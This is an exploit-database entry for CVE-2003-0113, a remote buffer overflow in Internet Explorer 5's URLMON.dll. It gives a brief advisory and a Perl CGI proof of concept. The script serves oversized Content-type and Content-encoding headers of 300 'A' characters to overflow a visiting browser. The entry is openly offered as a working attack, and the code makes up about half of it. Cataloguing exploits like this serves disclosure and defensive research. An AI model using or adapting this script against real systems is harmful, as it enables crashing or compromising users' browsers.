[] NeoSense

Microsoft Internet Explorer 5 - Remote 'URLMON.dll' Remote Buffer Overflow

Author: Jouko Pynnonen
type: remote
platform: windows
port: 
date_added: 2003-04-23 
date_updated: 2012-11-07 
verified: 1 
codes: CVE-2003-0113;OSVDB-7843 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/7419/info

A vulnerability has been discovered in Microsoft Internet Explorer. Due to insufficient bounds checking performed by URLMON.DLL it may be possible for a malicious web server to trigger a buffer overflow. This could result in the execution of arbitrary code within the context of the client user.

#!/usr/bin/perl
#
# Name this file as "urlmon-bo.cgi"
$LONG="A"x300;
print "Content-type: $LONG\r\n";
print "Content-encoding: $LONG\r\n";
print "\r\n"; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8- -